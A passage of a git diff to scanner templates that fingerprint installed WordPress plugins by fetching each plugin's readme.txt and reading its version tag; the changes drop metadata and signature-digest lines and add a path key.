tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-paypal-express-checkout/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022035e7587af644649bc9c2458a898ce0f0012ca5c218e7a39e1dc9f7fcfed98eeb0221009c89e35e34f61c64229237c68e6a4bf129fe1fc8024b5b319704e8da0271e7b4:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 55f0854f11..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-stripe/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204dc2cc1252382dab6f845c771d6af19d85e42e533a7fe92862a80a0b6fd9169202206e6f0550d693dfae8bbfe34dcd718a8afb0e4973dcb748c162d96d4e4caf16b9:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 75d837df76..51945eeedf 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-payments/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100884ef19c38bcb7ab14d7c8f3d0a464a91df4bc31539b769fd0f6253af3414176022100cf2ba03f59c34478afa898ffd937b599756c0d20a5cc911c1f7c9d02bc65ce9b:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 9fc64497cc..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-paypal-payments/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022029bc4f779f92d9d7afb6354ef80ff908a58f66e10fc28b2d0db06e43ef98956c022100b536eddf43a2999588511b7d1eab8e3a26a749248e57102e48a063f348f06662:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 8abb4c6b09..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-pdf-invoices-packing-slips/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022053798fda8a6651a801c10d463c641f9a4632c31fd5a8831028595a5bed28d291022100e0d5f45b4a92ac6128e0e4b7583529f97cf5947f59e3a36735d68247171bce0c:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 39d30f45e4..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-services/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c522d55cd9c6ced19962f900ffbfffd9c366fcc390c6b6f155bf86ea270c3c0d022075ab88528fc5508dc700fd85cc0902c3aa6bd287ee82989e3f135538e5768d82:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 26798cb37a..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woocommerce/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022045347d1306094017e4692ba99729d0312d80999aa16c581a9c67f630b87a7153022100fd523ab099db6922a87fc36021f495233087d2d886948e3cd3208df321d32815:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 76ec3ccb73..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wordfence/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b8647f3c2b1bfd7865f70868cfb97dc5007c2b24da645ea61619af90418ec918022100b53ab393f861a49341ffa9ef1bcd94c413cab8ec6f830073d96bed5996d3a74b:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index d751c6521c..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wordpress-importer/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200180dfc4097a139c536dfe6680c646330f4602e8ab2a0a5890b9476790ef0a51022100b07026c36c723f1f5cd3e1c12fa8bf39b9fce862413459c9c7b43913cfd3b18b:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index db46161d11..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wordpress-seo/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a1e0a23251e32d0dc5205d4813fe8024bc273a8f5b3c88f799cc12e2714f2067022100f6a845096cc18ce292018f3b47133bf4485dbc2965fcc2ead071377095febf36:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index c7fde73e67..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/worker/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100bb423da283c8ca58b85007286243801d121075f7f5113d945aa7d90906c1f3290220306e5214a7fa9923588a17e6aa8cb585d17ee93513a8a4aacee76c24bc95b40a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 138b667890..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200532aa89376314ecad3eec672876405db9cdacb7cd6d90e672499abf90ccf01d02210093ff3fcb05b676c5836e23e8c3141107ecca85d6d243db0be97e9d0f44dfbfbb:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index b6294299ed..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-file-manager/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a4e50eeee3404531c629be1ebc0b4a8cb83b9d6a995de40794ba48969e0a831002206f9579001724e847d6a0d6fc4e41482423065ee309478ea2b1f35e80ab1334ca:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 0a5fbcf19f..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-google-maps/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210099721d5257c09c1775239f74f29e3cc2c6dd4a86f5929ef476f2bfdf6667c7fe02205684f5765b948f15119829089603e562823b0b46c805d3cc7b5cde517717f546:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index d42dc6f5cb..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220514e4df073a941fba3c7c8ce0ed660091555a43b95688cf0c2e6f2ded5584819022100b0fbe418bd910c51f572aa8ef7cfa7d1f22b5f5383f6fd934cae0ae3a6574a90:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 4beb86cac0..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-maintenance-mode/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d98c5e219832c48b6affb2ca4853536ad20f6839cdd2f14b55298bd5ed680672022100977f5fda6c15976e849db4d570223c9fb0de55aadbf07f438d4edbb78f86fe55:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index ab6691f595..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-migrate-db/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e949fb6e856c06a5637048ed79d9935bb23dc041c3e1b8a88fadac45b94ef2cb022015b5c9adee0b0a29c4f65f2c021c5bd949f3aeee889ad4e453cd00e60596e1f3:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 3e04615837..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-multibyte-patch/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203d31faa6563f30c8d093064b9a9488cfca1cad93948f942e4c4b10e515415efa022100aac738d409023ad36ee440e50ebacf31f1ac2f1bd6cd9ab0323f526c44f44774:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index dacdf2efed..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-optimize/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ac59848fc8fb82f8b2b8103babe6f11fa416b346362aca645cfb01c6f01f639d02207c68c6a2b0bd39d2d68cc10923550d51ffd4ebbd0685298acd7f533f3c7d3991:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d69ecf71d7..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-pagenavi/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204e454e9d912fb47a5278bce25719bdc4537250fe38ef570852b50050d95cc01502202a3410c3461cd35021287b1c084807dbf22ce2e24cd697bd229811ab3d0d65db:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 27a741883e..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-reset/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009ed2e005ef63e144f295a218a36783e68353b9c2f03e831fbc9c7bc396b201fe02203a85be47c685d0524028c6c03c6ea8fd35df4ff9c4165ae5b0b1a3603c0f4619:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 1c2505a608..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: - max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-reviews-plugin-for-google/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210086b0764560eee4f089a96dd21ad882e02864e81121fe8871ef1dbe02ae8304c9022063a2157396e77a52f23e6e785c68e8b87d27862ca2ab34a824f575d98f399db8:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index bb9030a547..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-rollback/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022015761f913c63b729018d021e84acfd1cce4cba281f821340cd753a0c3cbc682602207779fa955f61aba30ca79fa56bb03ed2b8360cbc21f25e97ae8d6f91df2ad875:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 7ec5f5e279..2276545093 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-seopress/ metadata: - max-request: 1 plugin_namespace: wp-seopress wpscan: https://wpscan.com/plugin/wp-seopress tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-seopress/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c4435ec60762afbe8b634f34da0d2c7bd3d41152dbdaeb61ad0cf006d53b1554022100e120d3c7d098967193b1428b54f1c3c5668dd884f9e545b406da2269ec077c1e:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 76c9439909..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-sitemap-page/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022042a0213115c44c01a9e120a646ed92264c2b02eb28085ba4ba53bce1c143c8fc02205f84ed62fb22d0ba72e1e67f29ac7606da79ed0eec2d1a121f85eaf65183a926:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 277db29ea7..27f6d46c2b 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-smushit/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022042797bed0f502b5c55ffe921092f7610bcc8c5d87e413eb02284b2a4fed6f80702210086035fed1310c01ba6be9487a33acd7a9e6c6a9fe67cbcc838ed572eadbe5982:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index c440b4af4f..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022075387bf266b40ebc662d83d886858d4a01bd742cbd4342746e44d2f2105d5426022100fb8dc4c91415f058254de3b79d9c8836764d7028b5124c5988da9e94f32497b6:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index a4513565c4..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-super-cache/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203c78987a35c8630b2b044ffac0022fa9e6a0170ff8afaa9991b511f3c94e6617022042dd602cfffde6acd7b8ddadf4c33d2859c446429221a1c2307d6fd28e14dd50:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index 2a2ac0e0b2..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wp-user-avatar/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202de3c52280a37096009d59c3f77670e287cde0cf09d2ccfe7c149963ea425e8a022100c511a916efcc928f1cd2fbbb2728b6ca742568be1d4ee6a7915d0748dc03e4c9:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 2d0818c609..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wpcf7-recaptcha/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206e9b94b9361c11afbe40fc75cf71d57f1575f916c721dd93cff6a0ba83e5db81022070977cc5a2f79812d4cb3480f6c67bb40467042dd513ddbb5aebffdc1991cfa6:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index b62b0877d1..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wpcf7-redirect/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100fd2dfad92fec266fae1f5a41bb05ab71de869385cb13a7c0f2249d4e073ffcf7022044bfcbf010dcc8676dcb8c8e52b9f45a3c6b8af82626c97bc27f5405bca8d41a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index b91b7f35f0..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: 